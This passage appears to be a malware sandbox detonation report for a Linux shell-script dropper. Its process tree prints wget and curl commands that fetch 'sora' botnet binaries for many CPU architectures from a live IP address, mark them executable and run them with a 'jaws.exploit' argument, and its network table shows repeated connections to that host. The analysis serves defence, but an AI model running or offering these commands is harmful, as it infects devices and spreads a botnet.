| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh | N/A |
Processes
/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
[/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mips]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i468]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i686]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm5]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm6]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm7]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.m68k]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.sh4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]
/tmp/robben
[./robben jaws.exploit]
Network
| Country | Destination | Domain | Proto |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-18 01:47
Reported
2024-10-18 01:50
Platform
debian9-mipsel-20240611-en
Max time kernel
42s
Max time network
45s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh | N/A |
Processes
/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
[/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mips]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i468]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i686]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm5]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm6]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm7]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.m68k]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.sh4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]
/tmp/robben
[./robben jaws.exploit]
Network
| Country | Destination | Domain | Proto |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp |